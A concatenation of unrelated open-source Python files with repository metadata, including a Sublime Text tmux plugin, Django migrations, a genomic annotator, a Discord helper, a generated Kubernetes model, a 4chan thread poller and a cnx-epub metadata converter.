os_specific_settings = {}
if sys.platform == 'darwin':
os_specific_settings = sublime.load_settings('tmux (OSX).sublime-settings')
else:
os_specific_settings = sublime.load_settings('tmux (Linux).sublime-settings')
return os_specific_settings.get(key, settings.get(key, default))
class TmuxCommand():
def resolve_file_path(self):
if self.window.active_view().file_name():
return os.path.dirname(self.window.active_view().file_name())
elif len(self.window.folders()):
return self.window.folders()[0]
else:
sublime.status_message('tmux: Could not resolve file path - opening at home directory')
return os.path.expanduser('~')
def check_tmux_status(self):
tmux_status = subprocess.Popen(['tmux', 'info'])
tmux_status.wait()
return tmux_status.returncode is 0
def get_active_tmux_sessions(self):
parts = ['name', 'windows', 'created', 'attached', 'width', 'height']
list_sessions = subprocess.Popen([
'tmux',
'list-sessions',
'-F',
'#{session_' + '} #{session_'.join(parts) + '}'
], stdout=subprocess.PIPE)
return [dict(zip(parts, line.strip().split(' '))) for line in io.TextIOWrapper(list_sessions.stdout)]
def update_window_layout(self):
args = ['tmux', 'select-layout']
if get_setting('arrange_panes_on_split') == 'even':
args.append('even-' + ('horizontal' if '-h' in self.command_args else 'vertical'))
else:
args.append('tiled')
if '-t' in self.command_args:
args.extend(['-t', self.command_args[self.command_args.index('-t') + 1]])
subprocess.Popen(args)
def format_session_choices(self, sessions):
return list(map(
lambda sessio | n: [
'{}: {} window{}'.format(session['name'], session['windows'], 's'[int(session['windows']) == 1:]),
'{:%c}'.format(datetime.fromtimestamp(int(session['created']))),
'{}x{}{}'.format(session['width'], session['height'], ' (attached)' if int(ses | sion['attached']) else '')
],
sessions
))
def on_session_selected(self, index):
if index == -1:
return
self.command_args.extend(['-t', self.attached_sessions[index]['name'] + ':'])
self.execute()
def run_tmux(self, parameters, split):
try:
if self.check_tmux_status():
self.attached_sessions = list(filter(lambda x: int(x['attached']), self.get_active_tmux_sessions()))
self.command_args = ['tmux', 'split-window' if split else 'new-window']
self.command_args.extend(parameters)
if split == 'horizontal':
self.command_args.append('-h')
if len(self.attached_sessions) > 1:
return self.window.show_quick_panel(
self.format_session_choices(self.attached_sessions),
self.on_session_selected
)
self.execute()
except Exception as exception:
sublime.error_message('tmux: ' + str(exception))
def execute(self):
try:
for path in self.paths:
subprocess.Popen(self.command_args + ['-c', path])
if 'split-window' in self.command_args and get_setting('arrange_panes_on_split'):
self.update_window_layout()
except Exception as exception:
sublime.error_message('tmux: ' + str(exception))
class OpenTmuxCommand(sublime_plugin.WindowCommand, TmuxCommand):
def run(self, paths=[], split=None):
self.paths = [os.path.dirname(path) if not os.path.isdir(path) else path for path in paths]
if not len(self.paths):
self.paths.append(self.resolve_file_path())
self.run_tmux([], split)
class OpenTmuxProjectFolderCommand(sublime_plugin.WindowCommand, TmuxCommand):
def run(self, split=None):
parameters=[]
path = self.resolve_file_path()
matched_dirs = [x for x in self.window.folders() if path.find(x) == 0]
if len(matched_dirs):
path = matched_dirs[0]
if get_setting('set_project_window_name', True):
parameters.extend(['-n', path.split(os.sep)[-1]])
self.paths = [path]
self.run_tmux(parameters, split)
|
endthestart/photocontest | photocontest/photocontest/migrations/0009_auto__del_field_event_date.py | Python | mit | 2,554 | 0.007439 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Event.date'
db.delete_column(u'photocontest_event', 'date')
def backwards(self, orm):
# User chose to | not deal with backwards NULL issues for 'Event.date'
raise RuntimeError("Cannot reverse this migration. 'Event.date' and its values cannot be restored.")
# The following code is provided here to aid in writing a correct migration # Adding field 'Event.date'
db.add_column(u'photocontest_event', 'date',
self.gf('django.db.models.f | ields.DateField')(),
keep_default=False)
models = {
u'photocontest.event': {
'Meta': {'object_name': 'Event'},
'event_date': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'photocontest.photo': {
'Meta': {'object_name': 'Photo'},
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['photocontest.Event']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'photo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'profile': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['photocontest.Profile']", 'null': 'True', 'blank': 'True'})
},
u'photocontest.profile': {
'Meta': {'object_name': 'Profile'},
'copyright': ('django.db.models.fields.TextField', [], {'max_length': '1000'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '255'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'})
}
}
complete_apps = ['photocontest'] |
vivianbuan/cs3240-s15-team20 | SecureWitness/accounts/migrations/0006_auto_20150423_1615.py | Python | mit | 454 | 0 | # -*- coding: utf-8 - | *-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('accounts', '0005_auto_20150422_0105'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='key_expires',
field=models.DateTimeField(default=datetime.date(20 | 15, 4, 23)),
),
]
|
Genomon-Project/GenomonMutationAnnotator | lib/mutanno/annotator.py | Python | lgpl-3.0 | 2,295 | 0.009586 | import sys
import os
import re
import logging
import pysam
#
# Class definitions
#
class annotator:
def __init__(self, tabix_db, header, num | _output_column):
self.tabix_db = tabix_db
self.header = header
self.num_output_column = int(num_output_column)
def annotate(self, in_mutation_file, output):
tb = pysam.TabixFile(self.tabix_db)
# tabix open
srcfile = open(in_mutation_file,'r')
hResult = open(output,'w')
if self.header:
header = srcfile.readline().rstrip('\n')
header_array = self.header.split(',')
newheader = "\ | t".join(map(str,header_array))
print >> hResult, (header +"\t"+ newheader)
ori_result = ""
for num in range(self.num_output_column):
ori_result = ori_result + "---\t"
ori_result = ori_result[:-1]
for line in srcfile:
line = line.rstrip()
itemlist = line.split('\t')
# input file is annovar format (not zero-based number)
chr = itemlist[0]
start = (int(itemlist[1]) - 1)
end = int(itemlist[2])
ref = itemlist[3]
alt = itemlist[4]
chridx = chr.find('chr')
if chridx < 0:
chr = 'chr' + str(chr)
# tabix databese is a zero-based number
result = ori_result
try:
records = tb.fetch(chr, start, end)
for record_line in records:
record = record_line.split('\t')
ref_db = record[3]
alt_db = record[4]
if ref == ref_db and alt == alt_db:
result = record[5].replace(";;","\t")
except ValueError:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
logging.error( ("{0}: {1}:{2}".format( exc_type, fname, exc_tb.tb_lineno) ) )
print >> hResult, (line + "\t" + result)
continue
####
print >> hResult, (line + "\t" +result)
####
hResult.close()
srcfile.close()
tb.close()
|
haikentcode/haios | haios/setup.py | Python | mit | 356 | 0.008427 | from setuptools import setup
setup(name='haios',
version='0.1',
description='Image Se | arch Engine',
url='https://github.com/haikentcode/haios',
author='HITESH KUMAR REGAR (haikent)',
author_email='hiteshnitj16@gmail.com',
license='MIT',
packages=['descriptor','distance','spider','objects'],
z | ip_safe=False)
|
dchaplinsky/LT2OpenCorpora | lt2opencorpora/__init__.py | Python | mit | 121 | 0 | __version | __ = '2.0.3'
try:
from .convert import Dictionary
except ImportError:
# | To make setup.py work
pass
|
endlessm/chromium-browser | third_party/llvm/lldb/test/API/lang/objc/forward-decl/TestForwardDecl.py | Python | bsd-3-clause | 2,454 | 0.000815 | """Test that a forward-declared class works when its complete definition is in a library"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class ForwardDeclTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break inside main().
self.source = 'main.m'
self.line = line_number(self.source, '// Set breakpoint 0 here.')
self.shlib_names = ["Container"]
def do_test(self, dictionary=None):
self.build(dictionary=dictionary)
# Create a target by the debugger.
target = self.dbg.CreateTarget(self.getBuildArtifact("a.out"))
self.assertTrue(target, VALID_TARGET)
# Create the breakpoint inside function 'main'.
breakpoint = target.BreakpointCreateByLocation(self.source, self.line)
self.assertTrue(breakpoint, VALID_BREAKPOINT)
# Register our shared libraries for remote targets so they get
# automatically uploaded
environment = self.registerSharedLibrariesWithTarget(
target, self.shlib_names)
# Now launch the process, and do not stop at entry point.
process = target.LaunchSimple(
None, environment, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped',
'stop reason = breakpoint'])
# The breakpoint should have a hit count of 1.
self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
substrs=[' resolved, hit count = 1'])
# This should display correctly.
self.expect("expression [j getMember]", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 0x"])
@skipUnlessDarwin
def test_expr(self):
self.do_test()
@no_ | debug_info_test
@skipUnlessDarwin
@skipIf(compiler=no_match("clang"))
@skipIf(compiler_version=["<", "7.0"])
def test_debug_names(self):
"""Test that we are able to find complete types when using DWARF v5
accelerator tables"""
self.do_test(
dict(CFLAGS_EXTRAS="-dwarf-version=5 -mllvm -accel-table | s=Dwarf"))
|
prospwro/odoo | addons/irsid_base/models/__init__.py | Python | agpl-3.0 | 1,032 | 0.000969 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 OpenERP SA (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# i | t under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU | Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import doc
import doc_signature
#import abstract_doc
|
pyspace/test | pySPACE/resources/dataset_defs/dummy.py | Python | gpl-3.0 | 1,581 | 0.011385 | """ Store only meta data but no real data (except from store state of nodes) """
import logging
import os
import pwd
import yaml
from pySPACE.resources.dataset_defs.base import BaseDataset
class DummyDataset(BaseDataset):
""" Class to store only meta data of collection
This class overrides the 'store' method
in a way that only the collection meta data files are stored | .
This type is intended to be passed to pySPACE as a result
by the NilSinkNode.
**Parameters**
:dataset_md:
The meta data of | the current dataset.
(*optional, default: None*)
:Author: David Feess (david.feess@dfki.de)
:Created: 2010/03/30
"""
def __init__(self, dataset_md = None):
super(DummyDataset, self).__init__(dataset_md = dataset_md)
def store(self, result_dir, s_format = "None"):
if not s_format == "None":
self._log("The format %s is not supported!"%s_format, level=logging.CRITICAL)
return
# Update the meta data
try:
author = pwd.getpwuid(os.getuid())[4]
except:
author = "unknown"
self._log("Author could not be resolved.",level=logging.WARNING)
self.update_meta_data({"type": "only output of individual nodes stored",
"storage_format": s_format,
"author" : author,
"data_pattern": "no data stored"})
# Store meta data
BaseDataset.store_meta_data(result_dir,self.meta_data) |
StarbotDiscord/Starbot | libs/displayname.py | Python | apache-2.0 | 6,488 | 0.013255 | # Copyright (c) 2017 CorpNewt
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
import discord
def name(member : discord.Member):
# A helper function to return the member's display name
nick = name = None
try:
nick = member.nick
except AttributeError:
pass
try:
name = member.name
except AttributeError:
pass
if nick:
return nick
if name:
return name
return None
def memberForID(id, members, me):
# Check self first.
if me.id == id:
return me
# Check other members.
for member in members:
if member.id == id:
return member
return None
def memberForName(name, members, me):
# Check self first.
if me.display_name.lower() == name.lower():
return me
# Check rest of members.
for member in members:
if member.display_name.lower() == name.lower():
return member
# No member yet - try ID
memID = ''.join(list(filter(str.isdigit, name)))
newMem = memberForID(memID, members, me)
if newMem:
return newMem
return None
def roleForID(id, server):
for role in server.roles:
if role.id == id:
return role
return None
def roleForName(name, server):
for role in server.roles:
if role.name.lower() == name.lower():
return role
# No role yet - try ID
roleID = ''.join(list(filter(str.isdigit, name)))
newRole = roleForID(roleID, server)
if newRole:
return newRole
return None
def serverNick(user, server):
for member in server.members:
if member.id == user.id:
return name(member)
return None
def checkNameForInt(name, server):
theList = name.split()
# We see if we have multiple parts split by a space
if len(theList)<2:
# Only one part - no int included (or not separated by space)
# Check if member exists - and if not throw an error, if so, throw a diff error
amember = memberForName(name, server)
if amember:
# We at least have a member
return { "Member" : amember, "Int" : None }
else:
# Now we check if we got an ID instead
# Get just the numbers
memID = ''.join(list(filter(str.isdigit, name)))
newMem = memberForID(memID, server)
if newMem:
# We FOUND it!
return { "Member" : newMem, "Int" : None }
else:
# Nothing was right about this...
return { "Member" : None, "Int" : None }
try:
# Let's cast the last item as an int and catch any exceptions
theInt = int(theList[len(theList)-1])
newMemberName = " ".join(theList[:-1])
amember = memberForName(newMemberName, server)
if amember:
return { "Member" : amember, "Int" : theInt }
else:
# Now we check if we got an ID instead
# Get just the numbers
memID = ''.join(list(filter(str.isdigit, newMemberName)))
newMem = memberForID(memID, server)
if newMem:
# We FOUND it!
return { "Member" : newMem, "Int" : theInt }
else:
# Nothing was right about this...
return { "Member" : None, "Int" : None }
except ValueError:
# Last section wasn't an int
amember = memberForName(name, server)
if amember:
# Name was just a member - return
return { "Member" : amember, "Int" : None }
else:
# Now we check if we got an ID instead
# Get just the numbers
memID = ''.join(list(filter(str.isdigit, name)))
newMem = memberForID(memID, server)
if newMem:
# We FOUND it!
return { "Member" : newMem, "Int" : None }
else:
# Nothing was right about this...
return { "Member" : None, "Int" : None }
# Should never get here
return None
def checkRoleForInt(name, server):
theList = name.split()
# We see if we have multiple parts split by a space
if len(theList)<2:
# Only one part - no int included (or not separated by space)
# Check if role exists - and if not throw an error, if so, throw a diff error
amember = roleForName(name, server)
if amember:
# We at least have a member
return { "Role" : amember, "Int" : None }
else:
# Now we check if we got an ID instead
# Get just the numbers
memID = ''.join(list(filter(str.isdigit, name)))
newMem = roleForID(memID, server)
if newMem:
# We FOUND it!
return { "Role" : newMem, "Int" : None }
else:
# Nothing was right about this...
return { "Role" : None, "Int" : None }
try:
# Let's cast the last item as an int and catch any exceptions
theInt = int(theList[len(theList)-1])
newMemberName = " ".join(theList[:-1])
amember = roleForName(newMemberName, server)
if amember:
return { "Role" : amember, "Int" : theInt }
else:
# Now we check if we got an ID instead
# Get just the numbers
memID = ''.join(list(filter(str.isdigit, newMemberName)))
newMem = roleForID(memID, server)
| if newMem:
# We FOUND it!
return { "Role" : newMem, "Int" : theInt }
else:
# Nothing was right about this...
return { "Role" : None, "Int" : None }
except ValueError:
# Last section wasn't an int
amember = roleForName(name, server)
if amember:
# Name was just a role - return
return { "Role" : amember, "Int" : None }
else:
# Now we ch | eck if we got an ID instead
# Get just the numbers
memID = ''.join(list(filter(str.isdigit, name)))
newMem = roleForID(memID, server)
if newMem:
# We FOUND it!
return { "Role" : newMem, "Int" : None }
else:
# Nothing was right about this...
return { "Role" : None, "Int" : None }
# Should never get here
return None
|
mbohlool/client-python | kubernetes/client/models/v1_group_version_for_discovery.py | Python | apache-2.0 | 4,487 | 0.002006 | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.8.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1GroupVersionForDiscovery(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes: |
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'group_version': 'str',
'version': 'str'
}
attribute_map = {
'group_version': 'groupVersion',
'version': 'version'
| }
def __init__(self, group_version=None, version=None):
"""
V1GroupVersionForDiscovery - a model defined in Swagger
"""
self._group_version = None
self._version = None
self.discriminator = None
self.group_version = group_version
self.version = version
@property
def group_version(self):
"""
Gets the group_version of this V1GroupVersionForDiscovery.
groupVersion specifies the API group and version in the form \"group/version\"
:return: The group_version of this V1GroupVersionForDiscovery.
:rtype: str
"""
return self._group_version
@group_version.setter
def group_version(self, group_version):
"""
Sets the group_version of this V1GroupVersionForDiscovery.
groupVersion specifies the API group and version in the form \"group/version\"
:param group_version: The group_version of this V1GroupVersionForDiscovery.
:type: str
"""
if group_version is None:
raise ValueError("Invalid value for `group_version`, must not be `None`")
self._group_version = group_version
@property
def version(self):
"""
Gets the version of this V1GroupVersionForDiscovery.
version specifies the version in the form of \"version\". This is to save the clients the trouble of splitting the GroupVersion.
:return: The version of this V1GroupVersionForDiscovery.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""
Sets the version of this V1GroupVersionForDiscovery.
version specifies the version in the form of \"version\". This is to save the clients the trouble of splitting the GroupVersion.
:param version: The version of this V1GroupVersionForDiscovery.
:type: str
"""
if version is None:
raise ValueError("Invalid value for `version`, must not be `None`")
self._version = version
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1GroupVersionForDiscovery):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
ludobox/ludobox | server/tests/test_routes_api.py | Python | agpl-3.0 | 9,003 | 0.00411 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import json
from ludobox.content import read_content
from ludobox.routes.api import rest_api
# test helpers
from LudoboxTestCase import LudoboxTestCase
from helpers import delete_data_path, create_empty_data_path, add_samples_to_data_dir
class TestLudoboxWebServer(LudoboxTestCase):
def setUp(self):
# register routes
self.app.register_blueprint(rest_api)
# register a new user
rv = self.register(
email=self.user_email,
password=self.user_password
)
def test_home_status_code(self):
result = self.client.get('/')
# assert the status code of the response (redirected)
self.assertEqual(result.status_code, 200)
def test_api_show_home(self):
result = self.client.get('/api')
self.assertEqual(result.status_code, 200)
# self.assertEqual(json.loads(result.data), {"name" : self.config["ludobox_name"]})
def test_config_upload_allowed(self):
# self.login(email=self.user_email, password=self.user_password)
self.app.config["UPLOAD_ALLOWED"] = False
with self.client:
self.login()
result = self.client.post('/api/create',
data={},
content_type='multipart/form-data'
)
self.assertEqual(result.status_code, 401)
def test_add_game_forbidden(self):
"""Make sure only logged in user can add content"""
valid_info = self.borgia_info_content
delete_data_path(self.app.config["DAT | A_DIR"])
create_empty_data_path(self.app.config["DATA_DIR"])
data = {
'files': self.files,
'info': json.dumps(valid_info)
}
with self.app.test_client() as c:
result = c.post('/api/create',
data=data,
content_type='multipart/ | form-data'
)
print result.data
self.assertEqual(result.status_code, 403)
def test_api_create_content(self):
# create empy path for data
delete_data_path(self.tmp_path)
create_empty_data_path(self.tmp_path)
# load info without history
valid_info = self.borgia_info_content
data = {
'files': self.files,
'info': json.dumps(valid_info)
}
with self.client:
self.login()
result = self.client.post('/api/create',
data=data,
content_type='multipart/form-data'
)
print result.data
self.assertEqual(result.status_code, 201)
res = json.loads(result.data)
self.assertIn("path", res.keys())
# load JSON info data
with open(os.path.join(res["path"], 'info.json'), 'r' )as f:
stored_info = json.load(f)
self.assertEquals(stored_info["title"], valid_info["title"])
# check for files
written_filenames = os.listdir(os.path.join(res["path"], 'files'))
self.assertEqual(written_filenames.sort(), [f[1] for f in data["files"]].sort())
def test_api_update_content(self):
# create empy path for data
delete_data_path(self.tmp_path)
create_empty_data_path(self.tmp_path)
# load info without history
valid_info = self.borgia_info_content
data = {
'files': self.files,
'info': json.dumps(valid_info)
}
with self.client:
self.login()
result = self.client.post('/api/create',
data=data,
content_type='multipart/form-data'
)
print result.data
self.assertEqual(result.status_code, 201)
# make some changes
new_info = self.borgia_info_content.copy()
new_info["fab_time"] = 200
new_data = {
'info': json.dumps(new_info),
'slug': json.dumps(new_info["slug"])
}
# push changes to API
result = self.client.post('/api/update',
data=new_data,
content_type='multipart/form-data'
)
new_content = result.json["updated_content"]
self.assertEqual(result.status_code, 201)
self.assertEquals(new_content["fab_time"], 200 )
def test_api_update_content_non_existing_game(self):
with self.client:
self.login()
new_data = {
'info': json.dumps(self.borgia_info_content),
'slug': json.dumps("some-wrong-slug-")
}
result = self.client.post('/api/update',
data=new_data,
content_type='multipart/form-data'
)
self.assertEqual(result.status_code, 404)
def test_save_history_with_user(self):
"""Make sure the reference to user is correctly saved in history"""
# create empy path for data
delete_data_path(self.tmp_path)
create_empty_data_path(self.tmp_path)
# load info without history
valid_info = self.borgia_info_content
data = {
'files': self.files,
'info': json.dumps(valid_info)
}
with self.client:
self.login()
# create the game through API
result = self.client.post('/api/create',
data=data,
content_type='multipart/form-data'
)
self.assertEqual(result.status_code, 201)
game_path = result.json["path"]
# get the game content
game_info = read_content(game_path)
# check history event content
self.assertEqual(len(game_info["history"]), 1)
event = game_info["history"][0]
self.assertEqual(event["type"], "create")
self.assertEqual(event["user"], self.user_email)
# make some changes to the data
new_info = valid_info.copy()
new_info["title"] = "bla bla bla"
# post the update
new_data = {
'info' : json.dumps(new_info),
'slug' : json.dumps(new_info["slug"])
}
result = self.client.post('/api/update',
data=new_data,
content_type='multipart/form-data'
)
self.assertEqual(result.status_code, 201)
# read updated game
game_path = result.json["path"]
new_game_info = read_content(game_path)
new_game_info["title"] = "bla bla bla"
# check history event content
self.assertEqual(len(new_game_info["history"]), 2)
event = new_game_info["history"][1]
self.assertEqual(event["type"], "update")
self.assertEqual(event["user"], self.user_email)
# def test_form_add_game(self):
# """Posting data and files using form should create a new game"""
#
# # delete everything first
# clean(OUTPUT_DIR)
#
# valid_info = read_content(os.path.join(os.getcwd(), 'server/tests/test-data/test-game'))
# data = {
# 'files': self.files,
# 'info': json.dumps(valid_info)
# }
#
# result = self.client.post('/addgame',
# data=data,
# content_type='multipart/form-data'
# )
#
# # redirect
# self.assertEqual(result.status_code, 302)
#
|
CMPUT404W17T06/CMPUT404-project | dash/migrations/0003_auto_20170313_0117.py | Python | apache-2.0 | 497 | 0.002012 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-13 01:17
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
|
class Migration(migrations.Migration):
dependencies = [
('dash', '0002_remove_post_origin'),
]
operations = [
migrations.AlterField(
model_name='comment',
name | ='id',
field=models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False),
),
]
|
ATRAN2/Futami | futami/ami.py | Python | gpl-2.0 | 7,977 | 0.001128 | # -*- coding: utf-8 -*-
from collections import defaultdict
from itertools import chain
from functools import wraps
from operator import itemgetter
from multiprocessing import (
current_process,
SimpleQueue,
Process,
)
from time import sleep
import logging
import sys
import traceback
from retrying import retry
import requests
from futami.common import (
Action,
BoardTarget,
SubscriptionUpdate,
StoredException,
Post,
ThreadTarget,
)
SLEEP_TIME = 3 # seconds
THREAD_LIST = "https://a.4cdn.org/{board}/threads.json"
THREAD = "https://a.4cdn.org/{board}/res/{thread}.json"
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def flatten(lst):
return chain.from_iterable(lst)
class Ami:
def __init__(self, request_queue, response_queue):
self.request_queue = request_queue
self.response_queue = response_queue
self.update_request_queue = SimpleQueue()
Process(
target=self.update_loop,
name='periodic api worker',
args=(response_queue, self.update_request_queue),
).start()
logger.debug("initialization complete")
self.request_loop()
def proxy_exception_to(instance_attribute_exception_proxy_queue):
def _proxy_exception(f):
"""This isn't your normal-looking function.
"""
@wraps(f)
def wrapper(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
except BaseException as ex:
queue = getattr(self, instance_attribute_exception_proxy_queue)
tb = traceback.format_exc()
this_process = current_process()
queue.put(StoredException(tb, this_process.name))
return wrapper
return _proxy_exception
# Loop to handle fast part of LoadAndFollow and other requests from IRC
@proxy_exception_to("response_queue")
def request_loop(self):
# The identifier argument is an opaque
# identifier used by the queue client in some situations.
while True:
request = self.request_queue.get()
logger.debug("Got request {}".format(request))
if request.action is Action.LoadAndFollow:
if isinstance(request.target, BoardTarget):
# Download all threads
board = request.target.board
threads = self.get_board(board)
# Seed seen_boards so update_loop doesn't re-fetch them
self.update_request_queue.put(SubscriptionUpdate.make(
action=Action.InternalQueueUpdate,
target=request.target,
payload={thread['no']: thread['last_modified'] for thread in threads},
))
threads.sort(key=itemgetter('last_modified'))
# Download all thread content so we can get the OP
for thread in threads:
posts = list(self.get_thread(board, thread['no']))
op = posts[0]
op.payload = request.payload
self.response_queue.put(op)
elif isinstance(request.target, ThreadTarget):
posts = list(self.get_thread(
request.target.board,
request.target.thread
))
self.update_request_queue.put(SubscriptionUpdate.make(
action=Action.InternalQueueUpdate,
target=request.target,
payload=posts,
))
for post in posts:
post.payload = request.payload
self.response_queue.put(post)
@retry
def get_board(self, board):
url = THREAD_LIST.format(board=board)
pages = requests.get(url).json()
threads = list(flatten([page['threads'] for page in pages]))
return threads
@retry
def get_thread(self, board, thread):
url = THREAD.format(board=board, thread=thread)
posts = requests.get(url).json()['posts']
for post in posts:
post['board'] = board
posts = map(Post, posts)
return posts
# Timed loop to hit 4chan API
@proxy_exception_to("response_queue")
def update_loop(self, response_queue, update_request_queue):
# Set of boards that are watched
watched_boards = set()
# Dictionary of board => set of threads(string) that are watched
watched_threads = defaultdict(set)
# Dictionary of board => {thread_no => last_modified} last seen on board
seen_boards = defaultdict(dict)
# Dictionary of board, thread => posts last seen on thread
se | en_threads = defaultdict(lambda: defaultdict(list))
while True:
# Process pending update requests
| while not update_request_queue.empty():
request = update_request_queue.get()
if request.action is Action.InternalQueueUpdate:
if isinstance(request.target, BoardTarget):
watched_boards.add(request.target.board)
seen_boards[board] = request.payload
elif isinstance(request.target, ThreadTarget):
# assert request.target.board in watched_boards, "Asked to watch a thread of a board not currently being watched"
watched_threads[request.target.board].add(request.target.thread)
seen_threads[request.target.board][request.target.thread] = request.payload
# Fetch pending boards
pending_boards = defaultdict(dict)
for board in watched_boards:
pending_boards[board] = {
thread['no']:
thread['last_modified'] for thread in self.get_board(board)
}
to_delete = []
for board, threads in pending_boards.items():
for thread_no, last_modified in threads.items():
if thread_no not in seen_boards[board]:
thread = list(self.get_thread(board, thread_no))[0]
logger.debug("sending new thread {}".format(thread))
response_queue.put(thread)
elif last_modified > seen_boards[board][thread_no]:
thread = list(self.get_thread(board, thread_no))[0]
logger.debug("sending updated thread {}".format(thread))
response_queue.put(thread)
elif last_modified < seen_boards[board][thread_no]:
# Sometimes we get stale data immediately after reading
# it (tested under SLEEP_TIME = 3). Ignore this data.
to_delete.append((board, thread_no))
for board, thread_no in to_delete:
del pending_boards[board][thread_no]
seen_boards = pending_boards
# Fetch pending threads
pending_threads = defaultdict(lambda: defaultdict(list))
for board, threads in watched_threads.items():
for thread in threads:
pending_threads[board][thread] = list(self.get_thread(board, thread))
for board, threads in pending_threads.items():
for thread_no, posts in threads.items():
for post in posts:
if post not in seen_threads[board][thread_no]:
logger.debug("sending new post {}".format(post))
response_queue.put(post)
seen_threads = pending_threads
sleep(SLEEP_TIME)
|
Connexions/nebuchadnezzar | nebu/models/utils.py | Python | agpl-3.0 | 5,088 | 0 | from copy import copy
import json
from cnxepub.utils import squash_xml_to_text
from cnxml.parse import parse_metadata as parse_cnxml_metadata
from cnxtransforms import cnxml_abstract_to_html
from lxml import etree
__all__ = (
'convert_to_model_compat_metadata',
'scan_for_id_mapping',
'scan_for_uuid_mapping',
'build_id_to_uuid_mapping',
'id_from_metadata',
)
ACTORS_MAPPING_KEYS = (
# (<litezip name>, <cnx-epub name>),
('authors', 'authors'),
('licensors', 'copyright_holders'),
('maintainers', 'publishers'),
)
def _format_actors(actors):
"""Format the actors list of usernames to a cnx-epub compatable format"""
formatted_actors = []
for a in actors:
formatted_actors.append({'id': a, 'type': 'cnx-id', 'name': a})
return formatted_actors
def convert_to_model_compat_metadata(metadata):
"""\
Convert the metadata to cnx-epub model compatible metadata.
This creates a copy of the metadata. It does not mutate the given
metadata.
:param metadata: metadata
:type metadata: dict
:return: metadata
:rtype: dict
"""
md = copy(metadata)
md.setdefault('cnx-archive-shortid', None)
md.setdefault('cnx-archive-uri', '{}@{}'.format(md['id'], md['version']))
md.pop('id')
# FIXME cnx-epub has an issue rendering and parsing license_text set to
# None, so hard code it to 'CC BY' for now.
md.setdefault('license_text', 'CC BY')
md.setdefault('print_style', None)
md['derived_from_title'] = md['derived_from']['title']
md['derived_from_uri'] = md['derived_from']['uri']
md.pop('derived_from')
# Translate to a Person Info structure
for lz_key, epub_key in ACTORS_MAPPING_KEYS:
md[epub_key] = _format_actors(md.pop(lz_key))
md.setdefault('editors', [])
md.setdefault('illustrators', [])
md.setdefault('translators', [])
md['summary'] = md.pop('abstract')
md['summary'] = md['summary'] and md['summary'] or None
if md['summary'] is not None:
s = cnxml_abstract_to_html(md['summary'])
